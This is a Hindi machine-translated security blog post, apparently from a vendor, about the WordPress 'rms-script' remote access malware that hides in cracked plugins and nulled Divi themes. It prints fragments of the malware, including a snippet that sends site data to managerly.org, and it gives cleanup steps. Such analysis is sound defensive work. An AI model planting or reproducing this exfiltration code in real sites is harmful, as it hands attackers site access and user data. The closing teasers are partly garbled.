Computer >> कंप्यूटर >  >> नेटवर्किंग >> नेटवर्क सुरक्षा

[फिक्स] WordPress rms-script रिमोट एक्सेस मालवेयर

हाल ही में, कुछ वर्डप्रेस वेबसाइटों में रिमोट एक्सेस मैलवेयर पाया गया था जो बाहरी साइट को रिमोट एक्सेस दे रहा था। इस मैलवेयर का स्थान बाद में wp-content/mu-plugins फ़ोल्डर में कुछ यादृच्छिक PHP फ़ाइलें पाया गया। लोकप्रिय मुफ्त वर्डप्रेस सुरक्षा प्लगइन्स का उपयोग करके वेबसाइट को स्कैन करने पर भी, कोई विसंगति नहीं पाई गई। इस मैलवेयर के बारे में और जानने के लिए और इसे ठीक करने का तरीका जानने के लिए पढ़ें।

आरएमएस-स्क्रिप्ट मैलवेयर क्या करता है

सबसे पहले, ऐसा लगता है कि आपकी वर्डप्रेस साइट एक अजीब त्रुटि दिखा रही है। यह त्रुटि रिमोट एक्सेस मैलवेयर के कारण हो रही है और इसे wp-content/mu-plugins फ़ोल्डर में खोजा जा सकता है, विशेष रूप से नीचे दी गई तस्वीर में हाइलाइट की गई संदिग्ध PHP फ़ाइलें:

[फिक्स] WordPress rms-script रिमोट एक्सेस मालवेयर

साइट पर मैलवेयर स्कैन किए जाने के बाद भी, रिमोट एक्सेस मैलवेयर का कोई संकेत नहीं था। हालांकि, पीएचपी फाइलों की आगे जांच करने पर, यह पाया गया कि कोड एक बाहरी साइट, managerly.org को रिमोट लॉगिन एक्सेस दे रहा था।

आप संपूर्ण दुर्भावनापूर्ण rms-script PHP कोड देख सकते हैं जो यहां पाया गया था।

मैलवेयर में और खुदाई करना

संदिग्ध PHP फ़ाइलों (rms-script-mu-plugin.php और rms-script-ini.php) के संदर्भ के लिए साइट के प्लगइन्स के माध्यम से ब्राउज़ करने पर, यह पाया गया कि क्रैक किए गए प्लगइन्स में यह मैलवेयर हो सकता है। इन फ़ाइलों के निशान Divi थीम फ़ोल्डर में भी पाए गए थे - जिनमें से नमूना साइट पर एक शून्य संस्करण था। जब फ़ोल्डर हटा दिया गया, तो स्क्रिप्ट चलना बंद हो गईं।

क्रैक किए गए प्लगइन में मिले कोड का एक हिस्सा यहां दिया गया है जिसके लिए दो दुर्भावनापूर्ण PHP स्क्रिप्ट की आवश्यकता होती है:

require_once('rms-script-ini.php');
rms_remote_manager_init(__FILE__, 'rms-script-mu-plugin.php', false, false);

पिछले एक के बाद का कोड स्निपेट यहां दिया गया है:

$GLOBALS['rms_report_to'] = 'https://managerly.org/wp-admin/admin-ajax.php';

$args=
[
 'method' => 'POST',
 'timeout' => 15,
 'redirection' => 15,
 'headers' => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],
 'body' => $body
];
// Send to RMS
$curl = new Wp_Http_Curl();
$result=$curl->request($connect_to, $args);
$result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;

ऐसा लगता है कि यह कोड उस वेबसाइट से डेटा एकत्र करता है जिस पर वह है और इसे बाहरी साइट पर भेजता है - संक्षेप में, यह एक रिमोट एक्सेस मैलवेयर है जो आपके डेटा को साइट पर भेजता है managerly.org। यह बेहद हानिकारक हो सकता है - इसके बारे में अगले भाग में।

Managerly.org पर आगे के विश्लेषण से निम्नलिखित जानकारी का पता चलता है:

  • पंजीयक संगठन: वूशी यिलियन एलएलसी
  • रजिस्ट्रेंट राज्य/प्रांत: फ़ुज़ियान
  • पंजीयक देश: सीएन
  • नाम सर्वर: LARS.NS.CLOUDFLARE.COM, ASHLEY.NS.CLOUDFLARE.COM
  • डीएनएसईसी: अहस्ताक्षरित

रजिस्ट्रेंट संगठन का नाम सर्च करने पर रेडिट पोस्ट पर भी काफी हिट्स मिलते हैं। ऐसा लगता है कि यह एलएलसी नकली है और अन्य घोटालों में भी है। यहां कुछ खोज परिणाम दिए गए हैं:

[फिक्स] WordPress rms-script रिमोट एक्सेस मालवेयर

यह मैलवेयर खतरनाक क्यों है

रिमोट एक्सेस मालवेयर अटैक में, हमलावर आपकी वेबसाइट तक पहुंच प्राप्त कर सकते हैं और इसका उपयोग अपने दुर्भावनापूर्ण अभियानों के लिए कर सकते हैं। आप अपनी साइट पर नियंत्रण खो सकते हैं और हमलावर को संवेदनशील डेटा प्रकट किया जा सकता है।

यहां, हमलावर आरएमएस-स्क्रिप्ट रिमोट एक्सेस मैलवेयर के माध्यम से वर्डप्रेस खातों को माइन करने की कोशिश कर रहे हैं! यदि आप अपना पासवर्ड बदलते हैं तो भी यह हैक शायद आपकी वेबसाइट की सुरक्षा को बायपास कर सकता है।

सावधानी बरतने की बात - इस समस्या के बार-बार आने की संभावना अधिक होती है, क्योंकि मुफ़्त सुरक्षा उपकरण इस मैलवेयर का पता लगाने में सक्षम नहीं होते हैं। इसलिए, कृपया किसी भी संदिग्ध दिखने वाली फ़ाइलों के लिए अपनी वेबसाइट की अच्छी तरह से जाँच करना सुनिश्चित करें और यदि संभव हो तो अपनी वेबसाइट की सुरक्षा को सख्त करें।

यदि आपने इसे स्थापित किया है तो wp-contents/mu-plugins फ़ोल्डर और Divi थीम फ़ोल्डर में किसी भी दुर्भावनापूर्ण PHP फ़ाइलों की जांच करना भी सुनिश्चित करें।

[फिक्स] WordPress rms-script रिमोट एक्सेस मालवेयर

अपनी वर्डप्रेस साइट को कैसे ठीक करें

1. सफाई करने से पहले अपनी साइट का बैकअप लें:

वेबसाइट को ऑफ़लाइन करने की सलाह दी जाती है ताकि जब आप इसे साफ कर रहे हों तो उपयोगकर्ता संक्रमित पृष्ठों पर न जाएं। सभी कोर फाइलों और डेटाबेस का बैकअप लेना सुनिश्चित करें। एक संपीड़ित फ़ाइल प्रारूप में बैकअप लेना सुनिश्चित करें, जैसे .zip।

2. अपनी साइट से किसी भी खाली या फटे प्लग इन को हटा दें:

यह बहुत सारे प्लगइन्स और थीम की तरह लगता है - विशेष रूप से दिवि थीम - जो क्रैक या शून्य हो गया है, यह रिमोट एक्सेस मैलवेयर है। इस तरह के क्रैक किए गए प्लगइन्स और वर्डप्रेस क्लब से थीम में पाए जाने वाले इस मैलवेयर का विवरण इस स्टैक ओवरफ्लो उत्तर में पाया जा सकता है। इसलिए अपनी साइट से किसी भी खाली या फटे प्लग इन को हटाना सुनिश्चित करें और फिर मैलवेयर स्कैन चलाएं! केवल वास्तविक प्लगइन्स और थीम का उपयोग करें, और यह सुनिश्चित करने के लिए कि आपकी साइट असुरक्षित नहीं है, उन्हें अपडेट करते रहें।

3. सभी संदिग्ध फ़ोल्डर और फ़ाइलें हटाएं:

उन फ़ाइलों की जाँच करें जो संभावित रूप से आपकी साइट में दुर्भावनापूर्ण हो सकती हैं, और उन्हें हटा दें।

संबंधित मार्गदर्शिका – वर्डप्रेस मैलवेयर हटाना

4. मैलवेयर स्कैन चलाएँ:

मैलवेयर लगातार विकसित हो रहा है, लेकिन मैलवेयर स्कैनर भी ऐसा ही कर रहे हैं। मैलवेयर और दुर्भावनापूर्ण फ़ाइलों के लिए अपने वेब सर्वर पर मैलवेयर स्कैन चलाना हमेशा एक अच्छा विचार है। आप अपने वेब होस्ट द्वारा प्रदान किए गए cPanel में 'वायरस स्कैनर' टूल का उपयोग कर सकते हैं, या एस्ट्रा प्रो प्लान के साथ विशेषज्ञ मैलवेयर क्लीनअप प्राप्त कर सकते हैं। हमारा मैलवेयर स्कैनर दुर्भावनापूर्ण PHP फ़ाइलों को फ़्लैग करता है!

[फिक्स] WordPress rms-script रिमोट एक्सेस मालवेयर

वर्डप्रेस wp-content/mu-plugin रिमोट एक्सेस मालवेयर:निष्कर्ष

हाल ही में वर्डप्रेस साइट्स में रिमोट एक्सेस मालवेयर पाया गया था, जो ज्यादातर नल या क्रैक किए गए प्लगइन्स का उपयोग कर रहे थे। हालांकि इस मैलवेयर को बहुत सारे लोकप्रिय मैलवेयर स्कैनर द्वारा फ़्लैग नहीं किया गया था, लेकिन उन्हें लगातार अपडेट किया जा रहा है और यदि आपको संदेह है कि आपकी साइट प्रभावित हो सकती है, तो स्कैन चलाना एक अच्छा विचार है। इसके अलावा, केवल वास्तविक प्लगइन्स और थीम का उपयोग करना और उन्हें अपडेट रखना यह सुनिश्चित करने का एक शानदार तरीका है कि आपकी साइट सुरक्षित रहे।

एस्ट्रा के बारे में

एस्ट्रा एक आवश्यक वेब सुरक्षा सूट है जो आपके लिए हैकर्स, इंटरनेट खतरों और बॉट्स से लड़ता है। हम वर्डप्रेस, ओपनकार्ट, मैगेंटो आदि जैसे लोकप्रिय सीएमएस चलाने वाली आपकी वेबसाइटों के लिए सक्रिय सुरक्षा प्रदान करते हैं। हमारी तकनीकी सहायता टीम हैकिंग और मैलवेयर संक्रमण स्थितियों के बारे में आपके सभी प्रश्नों में आपकी सहायता के लिए पूरे वर्ष 24×7 उपलब्ध है।


  1. एस्ट्रा सिक्योरिटी द्वारा वर्डप्रेस हैक और मैलवेयर हटाने की सेवा

    वर्डप्रेस की बदौलत वेब पर सामग्री का प्रबंधन अब कुछ ही सेकंड का हो गया है। दक्षता और सामर्थ्य के साथ, वर्डप्रेस को सबसे अनुकूल सीएमएस का ताज पहनाया गया है। फिर भी, वर्डप्रेस साइट हैक की गई एक निरंतर घटना बन गई है। वास्तव में, वर्डप्रेस व्यापक रूप से लक्षित सीएमएस- हैकर्स के पसंदीदा में से एक है। वर्

  1. WordPress पर पुश सूचना और पुनर्निर्देशन मैलवेयर को कैसे ठीक करें

    पिछले कुछ हफ्तों से, एस्ट्रा के सुरक्षा शोधकर्ता वर्डप्रेस पर पुश नोटिफिकेशन मैलवेयर को ट्रैक कर रहे हैं। . इस अभियान को वर्डप्रेस वेबसाइटों पर चल रहे पुनर्निर्देशन अभियान के साथ जोड़ा गया है। कुछ दुर्भावनापूर्ण डोमेन जहां पुनर्निर्देशन हो रहा है, उनमें शामिल हैं inpagepush[.]com, asoulrox[.]com औ

  1. साइट WordPress Hackeado. कोमो रिमूवर वायरस वर्डप्रेस करते हैं

    हे seu साइट WordPress foi hackeado e infectado por मैलवेयर? से वोक ई उम नोवेटो, पोडे से सेंटीर पेर्डिडो एओ डेसीदिर ओ क्यू फेजर ई कोमो फाजू-लो पैरा से लिवर दो हैक। Mesmo se você tivesse uma मौका com o desenvolvimento, ainda é difícil encontrar e remover com precisão um hack. अस्सिम, रीनी इस्ट एक्सट